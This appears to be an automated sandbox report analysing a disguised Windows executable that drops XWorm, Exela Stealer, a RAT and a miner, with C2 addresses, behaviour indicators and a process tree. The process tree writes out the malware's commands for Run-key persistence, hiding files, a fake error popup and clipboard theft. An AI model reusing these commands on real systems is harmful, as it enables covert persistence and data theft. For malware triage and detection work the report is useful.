Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-10-2024 19:21
Static task
static1
Behavioral task
behavioral1
Sample
EasyBeamer-cleaned.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
EasyBeamer-cleaned.exe
Resource
win10v2004-20241007-en
General
-
Target
EasyBeamer-cleaned.exe
-
Size
21.4MB
-
MD5
b04e319c4790ffdfb8439a11c81921d4
-
SHA1
f97a36195b51f276569cdc4126a84df9291a2c7c
-
SHA256
21d51ebab060a061134f9ac72f6f4002ecc238e459eecc7bc7c4dd0d9ab17e7f
-
SHA512
30d337e1dd323dc4544a9a99ba73786fe4dbab926915a66f213804f530df5540576b703517e2e89e76ef9dbe891917425a7689132100ccdd6690ccf986f9f799
-
SSDEEP
393216:gL/MPnh2WU7c5pIP3cbVH2Pk6QNfghTY9uffSC+npRuaQaOft8pmA7rqFC:gL/2Dw3PsVxlghL3SCA8t8pmA3qFC
Malware Config
Extracted
xworm
192.168.1.45:24471
147.185.221.16:40745
-
Install_directory
%LocalAppData%
Signatures
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral2/files/0x000f000000023aa1-20.dat family_xworm behavioral2/files/0x000e000000023aa3-31.dat family_xworm behavioral2/memory/1968-56-0x0000000000FF0000-0x0000000001004000-memory.dmp family_xworm behavioral2/memory/3080-90-0x00000000006F0000-0x0000000000706000-memory.dmp family_xworm -
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
-
Exelastealer family
-
Xworm family
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
pid Process 4988 powershell.exe 1232 powershell.exe 3940 powershell.exe 5852 powershell.exe 1080 powershell.exe 6072 powershell.exe 3852 powershell.exe 3568 powershell.exe 4840 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 6092 netsh.exe 5180 netsh.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation EasyBeamer-cleaned.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation remote.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Essence Rat.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation svchost.exe -
Clipboard Data 1 TTPs 4 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4744 cmd.exe 5692 powershell.exe 660 cmd.exe 5780 powershell.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk Essence Rat.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk Essence Rat.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegEdit.lnk remote.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegEdit.lnk remote.exe -
Executes dropped EXE 17 IoCs
pid Process 2104 Kyle Grabber.exe 1968 Essence Rat.exe 3080 remote.exe 1064 miner.exe 4996 Kyle Grabber.exe 5048 Built.exe 3596 Built.exe 2676 rar.exe 2708 Discord 892 RegEdit.exe 3576 svchost.exe 5952 sihost64.exe 4984 Discord 2236 RegEdit.exe 2160 svchost.exe 1856 Discord 5664 RegEdit.exe -
Loads dropped DLL 51 IoCs
pid Process 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 3596 Built.exe 3596 Built.exe 3596 Built.exe 3596 Built.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 3596 Built.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 3596 Built.exe 3596 Built.exe 3596 Built.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 3596 Built.exe 3596 Built.exe 3596 Built.exe 3596 Built.exe 3596 Built.exe 3596 Built.exe 4996 Kyle Grabber.exe 3596 Built.exe 3596 Built.exe 3596 Built.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe 4996 Kyle Grabber.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegEdit = "C:\\Users\\Admin\\AppData\\Roaming\\RegEdit.exe" remote.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Discord = "C:\\Users\\Admin\\AppData\\Local\\Discord" Essence Rat.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 28 discord.com 29 discord.com 38 discord.com 39 discord.com 40 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 ip-api.com 26 ip-api.com -
pid Process 5268 ARP.EXE 4992 cmd.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 9 IoCs
pid Process 892 tasklist.exe 5196 tasklist.exe 5172 tasklist.exe 5732 tasklist.exe 4592 tasklist.exe 5680 tasklist.exe 6084 tasklist.exe 2896 tasklist.exe 2676 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 1032 cmd.exe -
resource yara_rule behavioral2/files/0x0007000000023c72-184.dat upx behavioral2/files/0x0007000000023c9f-191.dat upx behavioral2/memory/4996-197-0x00007FF924720000-0x00007FF924D83000-memory.dmp upx behavioral2/files/0x0007000000023c92-199.dat upx behavioral2/files/0x0007000000023c6a-228.dat upx behavioral2/files/0x000a000000023b83-230.dat upx behavioral2/memory/4996-252-0x00007FF926610000-0x00007FF926624000-memory.dmp upx behavioral2/memory/4996-251-0x00007FF9329A0000-0x00007FF9329AF000-memory.dmp upx behavioral2/memory/4996-250-0x00007FF938C60000-0x00007FF938C6D000-memory.dmp upx behavioral2/memory/4996-253-0x00007FF923970000-0x00007FF923EA3000-memory.dmp upx behavioral2/memory/4996-249-0x00007FF938C80000-0x00007FF938C8D000-memory.dmp upx behavioral2/memory/4996-248-0x00007FF926640000-0x00007FF926659000-memory.dmp upx behavioral2/memory/4996-246-0x00007FF926660000-0x00007FF92668B000-memory.dmp upx behavioral2/memory/4996-245-0x00007FF9307C0000-0x00007FF9307D9000-memory.dmp upx behavioral2/memory/4996-270-0x00007FF9238A0000-0x00007FF92396E000-memory.dmp upx behavioral2/memory/3596-271-0x00007FF9242B0000-0x00007FF924716000-memory.dmp upx behavioral2/memory/3596-275-0x00007FF922F00000-0x00007FF923275000-memory.dmp upx behavioral2/memory/3596-280-0x00007FF923280000-0x00007FF923338000-memory.dmp upx behavioral2/memory/3596-281-0x00007FF9265F0000-0x00007FF926605000-memory.dmp upx behavioral2/memory/3596-285-0x00007FF924190000-0x00007FF9242A8000-memory.dmp upx behavioral2/memory/4996-286-0x00007FF9262D0000-0x00007FF926308000-memory.dmp upx behavioral2/memory/3596-284-0x00007FF938CB0000-0x00007FF938CD4000-memory.dmp upx behavioral2/memory/3596-279-0x00007FF9234B0000-0x00007FF9234DE000-memory.dmp upx behavioral2/memory/3596-278-0x00007FF926310000-0x00007FF92631D000-memory.dmp upx behavioral2/memory/4996-277-0x00007FF9218B0000-0x00007FF92203A000-memory.dmp upx behavioral2/memory/3596-274-0x00007FF923840000-0x00007FF92384D000-memory.dmp upx behavioral2/memory/4996-273-0x00007FF9234E0000-0x00007FF92365F000-memory.dmp upx behavioral2/memory/4996-272-0x00007FF924720000-0x00007FF924D83000-memory.dmp upx behavioral2/memory/3596-269-0x00007FF923850000-0x00007FF923869000-memory.dmp upx behavioral2/memory/4996-268-0x00007FF923870000-0x00007FF923895000-memory.dmp upx behavioral2/memory/4996-267-0x00007FF923FD0000-0x00007FF924006000-memory.dmp upx behavioral2/memory/3596-266-0x00007FF923660000-0x00007FF9237DD000-memory.dmp upx behavioral2/memory/3596-265-0x00007FF924010000-0x00007FF92402F000-memory.dmp upx behavioral2/memory/3596-264-0x00007FF9265D0000-0x00007FF9265E8000-memory.dmp upx behavioral2/memory/4996-263-0x00007FF924030000-0x00007FF924064000-memory.dmp upx behavioral2/memory/3596-262-0x00007FF926320000-0x00007FF92634C000-memory.dmp upx behavioral2/memory/4996-287-0x00007FF926260000-0x00007FF926276000-memory.dmp upx behavioral2/memory/4996-290-0x00007FF924150000-0x00007FF924164000-memory.dmp upx behavioral2/memory/4996-295-0x00007FF9218B0000-0x00007FF92203A000-memory.dmp upx behavioral2/memory/3596-312-0x00007FF922F00000-0x00007FF923275000-memory.dmp upx behavioral2/memory/4996-311-0x00007FF922690000-0x00007FF9226A1000-memory.dmp upx behavioral2/memory/4996-310-0x00007FF922090000-0x00007FF9220DD000-memory.dmp upx behavioral2/memory/3596-405-0x00007FF923280000-0x00007FF923338000-memory.dmp upx behavioral2/memory/3596-404-0x00007FF9234B0000-0x00007FF9234DE000-memory.dmp upx behavioral2/memory/4996-309-0x00007FF922920000-0x00007FF922938000-memory.dmp upx behavioral2/memory/4996-308-0x00007FF922EA0000-0x00007FF922EB6000-memory.dmp upx behavioral2/memory/3596-307-0x00007FF923850000-0x00007FF923869000-memory.dmp upx behavioral2/memory/4996-306-0x00007FF923870000-0x00007FF923895000-memory.dmp upx behavioral2/memory/3596-417-0x00007FF924190000-0x00007FF9242A8000-memory.dmp upx behavioral2/memory/4996-454-0x00007FF9262D0000-0x00007FF926308000-memory.dmp upx behavioral2/memory/4996-611-0x00007FF9329A0000-0x00007FF9329AF000-memory.dmp upx behavioral2/memory/3596-636-0x00007FF924010000-0x00007FF92402F000-memory.dmp upx behavioral2/memory/3596-632-0x00007FF938CB0000-0x00007FF938CD4000-memory.dmp upx behavioral2/memory/4996-619-0x00007FF9218B0000-0x00007FF92203A000-memory.dmp upx behavioral2/memory/4996-627-0x00007FF922EA0000-0x00007FF922EB6000-memory.dmp upx behavioral2/memory/4996-621-0x00007FF926260000-0x00007FF926276000-memory.dmp upx behavioral2/memory/4996-620-0x00007FF9262D0000-0x00007FF926308000-memory.dmp upx behavioral2/memory/4996-618-0x00007FF9234E0000-0x00007FF92365F000-memory.dmp upx behavioral2/memory/4996-613-0x00007FF923970000-0x00007FF923EA3000-memory.dmp upx behavioral2/memory/4996-610-0x00007FF938C60000-0x00007FF938C6D000-memory.dmp upx behavioral2/memory/3596-637-0x00007FF923660000-0x00007FF9237DD000-memory.dmp upx behavioral2/memory/3596-631-0x00007FF9242B0000-0x00007FF924716000-memory.dmp upx behavioral2/memory/4996-615-0x00007FF9238A0000-0x00007FF92396E000-memory.dmp upx behavioral2/memory/4996-614-0x00007FF924030000-0x00007FF924064000-memory.dmp upx -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2156 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x0010000000023a84-8.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4368 cmd.exe 5820 netsh.exe 4392 cmd.exe 5824 netsh.exe -
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
pid Process 2252 NETSTAT.EXE -
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 5680 WMIC.exe -
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5520 WMIC.exe 2632 WMIC.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 2252 NETSTAT.EXE 5832 ipconfig.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
pid Process 5812 systeminfo.exe 5952 systeminfo.exe -
Runs net.exe
-
Runs regedit.exe 3 IoCs
pid Process 2236 RegEdit.exe 5664 RegEdit.exe 892 RegEdit.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5352 schtasks.exe 2656 schtasks.exe 5528 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2396 powershell.exe 2396 powershell.exe 3568 powershell.exe 3568 powershell.exe 3852 powershell.exe 3852 powershell.exe 4840 powershell.exe 4840 powershell.exe 3940 powershell.exe 3940 powershell.exe 4840 powershell.exe 2396 powershell.exe 2396 powershell.exe 3940 powershell.exe 5692 powershell.exe 5692 powershell.exe 3852 powershell.exe 3852 powershell.exe 3568 powershell.exe 3568 powershell.exe 5996 powershell.exe 5996 powershell.exe 1968 Essence Rat.exe 1968 Essence Rat.exe 5692 powershell.exe 5996 powershell.exe 5592 powershell.exe 5592 powershell.exe 1080 powershell.exe 1080 powershell.exe 5592 powershell.exe 1080 powershell.exe 1064 miner.exe 1064 miner.exe 5852 powershell.exe 5852 powershell.exe 5852 powershell.exe 6072 powershell.exe 6072 powershell.exe 6072 powershell.exe 4988 powershell.exe 4988 powershell.exe 4988 powershell.exe 5500 powershell.exe 5500 powershell.exe 5500 powershell.exe 5780 powershell.exe 5780 powershell.exe 5780 powershell.exe 1232 powershell.exe 1232 powershell.exe 1232 powershell.exe 1716 powershell.exe 1716 powershell.exe 1716 powershell.exe 5972 powershell.exe 5972 powershell.exe 5972 powershell.exe 5144 powershell.exe 5144 powershell.exe 5144 powershell.exe 3576 svchost.exe 3576 svchost.exe 5428 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1968 Essence Rat.exe Token: SeDebugPrivilege 3080 remote.exe Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 4592 tasklist.exe Token: SeDebugPrivilege 2676 tasklist.exe Token: SeDebugPrivilege 3568 powershell.exe Token: SeDebugPrivilege 3852 powershell.exe Token: SeDebugPrivilege 4840 powershell.exe Token: SeDebugPrivilege 3940 powershell.exe Token: SeDebugPrivilege 5692 powershell.exe Token: SeIncreaseQuotaPrivilege 5880 WMIC.exe Token: SeSecurityPrivilege 5880 WMIC.exe Token: SeTakeOwnershipPrivilege 5880 WMIC.exe Token: SeLoadDriverPrivilege 5880 WMIC.exe Token: SeSystemProfilePrivilege 5880 WMIC.exe Token: SeSystemtimePrivilege 5880 WMIC.exe Token: SeProfSingleProcessPrivilege 5880 WMIC.exe Token: SeIncBasePriorityPrivilege 5880 WMIC.exe Token: SeCreatePagefilePrivilege 5880 WMIC.exe Token: SeBackupPrivilege 5880 WMIC.exe Token: SeRestorePrivilege 5880 WMIC.exe Token: SeShutdownPrivilege 5880 WMIC.exe Token: SeDebugPrivilege 5880 WMIC.exe Token: SeSystemEnvironmentPrivilege 5880 WMIC.exe Token: SeRemoteShutdownPrivilege 5880 WMIC.exe Token: SeUndockPrivilege 5880 WMIC.exe Token: SeManageVolumePrivilege 5880 WMIC.exe Token: 33 5880 WMIC.exe Token: 34 5880 WMIC.exe Token: 35 5880 WMIC.exe Token: 36 5880 WMIC.exe Token: SeDebugPrivilege 5732 tasklist.exe Token: SeDebugPrivilege 5996 powershell.exe Token: SeDebugPrivilege 1968 Essence Rat.exe Token: SeIncreaseQuotaPrivilege 5880 WMIC.exe Token: SeSecurityPrivilege 5880 WMIC.exe Token: SeTakeOwnershipPrivilege 5880 WMIC.exe Token: SeLoadDriverPrivilege 5880 WMIC.exe Token: SeSystemProfilePrivilege 5880 WMIC.exe Token: SeSystemtimePrivilege 5880 WMIC.exe Token: SeProfSingleProcessPrivilege 5880 WMIC.exe Token: SeIncBasePriorityPrivilege 5880 WMIC.exe Token: SeCreatePagefilePrivilege 5880 WMIC.exe Token: SeBackupPrivilege 5880 WMIC.exe Token: SeRestorePrivilege 5880 WMIC.exe Token: SeShutdownPrivilege 5880 WMIC.exe Token: SeDebugPrivilege 5880 WMIC.exe Token: SeSystemEnvironmentPrivilege 5880 WMIC.exe Token: SeRemoteShutdownPrivilege 5880 WMIC.exe Token: SeUndockPrivilege 5880 WMIC.exe Token: SeManageVolumePrivilege 5880 WMIC.exe Token: 33 5880 WMIC.exe Token: 34 5880 WMIC.exe Token: 35 5880 WMIC.exe Token: 36 5880 WMIC.exe Token: SeDebugPrivilege 5592 powershell.exe Token: SeDebugPrivilege 1080 powershell.exe Token: SeDebugPrivilege 5680 tasklist.exe Token: SeDebugPrivilege 1064 miner.exe Token: SeDebugPrivilege 5852 powershell.exe Token: SeDebugPrivilege 6072 powershell.exe Token: SeDebugPrivilege 4988 powershell.exe Token: SeDebugPrivilege 5500 powershell.exe Token: SeIncreaseQuotaPrivilege 5520 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1968 Essence Rat.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1744 wrote to memory of 2104 1744 EasyBeamer-cleaned.exe 87 PID 1744 wrote to memory of 2104 1744 EasyBeamer-cleaned.exe 87 PID 1744 wrote to memory of 1968 1744 EasyBeamer-cleaned.exe 88 PID 1744 wrote to memory of 1968 1744 EasyBeamer-cleaned.exe 88 PID 1744 wrote to memory of 3080 1744 EasyBeamer-cleaned.exe 89 PID 1744 wrote to memory of 3080 1744 EasyBeamer-cleaned.exe 89 PID 1744 wrote to memory of 1064 1744 EasyBeamer-cleaned.exe 90 PID 1744 wrote to memory of 1064 1744 EasyBeamer-cleaned.exe 90 PID 2104 wrote to memory of 4996 2104 Kyle Grabber.exe 91 PID 2104 wrote to memory of 4996 2104 Kyle Grabber.exe 91 PID 1744 wrote to memory of 5048 1744 EasyBeamer-cleaned.exe 92 PID 1744 wrote to memory of 5048 1744 EasyBeamer-cleaned.exe 92 PID 5048 wrote to memory of 3596 5048 Built.exe 93 PID 5048 wrote to memory of 3596 5048 Built.exe 93 PID 1064 wrote to memory of 4816 1064 miner.exe 302 PID 1064 wrote to memory of 4816 1064 miner.exe 302 PID 3596 wrote to memory of 704 3596 Built.exe 237 PID 3596 wrote to memory of 704 3596 Built.exe 237 PID 3596 wrote to memory of 2204 3596 Built.exe 97 PID 3596 wrote to memory of 2204 3596 Built.exe 97 PID 3596 wrote to memory of 4116 3596 Built.exe 98 PID 3596 wrote to memory of 4116 3596 Built.exe 98 PID 4816 wrote to memory of 2396 4816 cmd.exe 104 PID 4816 wrote to memory of 2396 4816 cmd.exe 104 PID 3596 wrote to memory of 4252 3596 Built.exe 105 PID 3596 wrote to memory of 4252 3596 Built.exe 105 PID 3596 wrote to memory of 1604 3596 Built.exe 106 PID 3596 wrote to memory of 1604 3596 Built.exe 106 PID 3080 wrote to memory of 3852 3080 remote.exe 109 PID 3080 wrote to memory of 3852 3080 remote.exe 109 PID 4996 wrote to memory of 4732 4996 Kyle Grabber.exe 110 PID 4996 wrote to memory of 4732 4996 Kyle Grabber.exe 110 PID 704 wrote to memory of 3568 704 cmd.exe 113 PID 704 wrote to memory of 3568 704 cmd.exe 113 PID 4252 wrote to memory of 4592 4252 cmd.exe 114 PID 4252 wrote to memory of 4592 4252 cmd.exe 114 PID 1604 wrote to memory of 2676 1604 cmd.exe 214 PID 1604 wrote to memory of 2676 1604 cmd.exe 214 PID 4116 wrote to memory of 4840 4116 cmd.exe 116 PID 4116 wrote to memory of 4840 4116 cmd.exe 116 PID 2204 wrote to memory of 3940 2204 cmd.exe 117 PID 2204 wrote to memory of 3940 2204 cmd.exe 117 PID 3596 wrote to memory of 224 3596 Built.exe 118 PID 3596 wrote to memory of 224 3596 Built.exe 118 PID 3596 wrote to memory of 4744 3596 Built.exe 119 PID 3596 wrote to memory of 4744 3596 Built.exe 119 PID 3596 wrote to memory of 3008 3596 Built.exe 121 PID 3596 wrote to memory of 3008 3596 Built.exe 121 PID 3596 wrote to memory of 2648 3596 Built.exe 124 PID 3596 wrote to memory of 2648 3596 Built.exe 124 PID 3596 wrote to memory of 4368 3596 Built.exe 126 PID 3596 wrote to memory of 4368 3596 Built.exe 126 PID 3596 wrote to memory of 3924 3596 Built.exe 128 PID 3596 wrote to memory of 3924 3596 Built.exe 128 PID 3596 wrote to memory of 3964 3596 Built.exe 130 PID 3596 wrote to memory of 3964 3596 Built.exe 130 PID 3596 wrote to memory of 3988 3596 Built.exe 132 PID 3596 wrote to memory of 3988 3596 Built.exe 132 PID 1968 wrote to memory of 5352 1968 Essence Rat.exe 135 PID 1968 wrote to memory of 5352 1968 Essence Rat.exe 135 PID 4744 wrote to memory of 5692 4744 cmd.exe 137 PID 4744 wrote to memory of 5692 4744 cmd.exe 137 PID 2648 wrote to memory of 5724 2648 cmd.exe 160 PID 2648 wrote to memory of 5724 2648 cmd.exe 160 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 5540 attrib.exe 4676 attrib.exe 6032 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\EasyBeamer-cleaned.exe"C:\Users\Admin\AppData\Local\Temp\EasyBeamer-cleaned.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\Kyle Grabber.exe"C:\Users\Admin\AppData\Local\Temp\Kyle Grabber.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\Kyle Grabber.exe"C:\Users\Admin\AppData\Local\Temp\Kyle Grabber.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"4⤵PID:4732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:5404
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:5520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"4⤵PID:3376
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer5⤵PID:5268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"4⤵PID:5944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵PID:5976
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"4⤵PID:5628
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer5⤵PID:5472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5836
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:3728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵PID:4884
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:5196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""4⤵
- Hide Artifacts: Hidden Files and Directories
PID:1032 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"5⤵
- Views/modifies file attributes
PID:4676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"4⤵PID:1964
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f5⤵
- Adds Run key to start application
PID:1728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""4⤵PID:1860
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"5⤵PID:6040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵PID:5708
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:6084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"4⤵PID:704
-
C:\Windows\system32\cmd.execmd.exe /c chcp5⤵PID:3584
-
C:\Windows\system32\chcp.comchcp6⤵PID:2156
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"4⤵PID:5180
-
C:\Windows\system32\cmd.execmd.exe /c chcp5⤵PID:5268
-
C:\Windows\system32\chcp.comchcp6⤵PID:2252
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:1480
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"4⤵
- Clipboard Data
PID:660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:5780
-
-
-
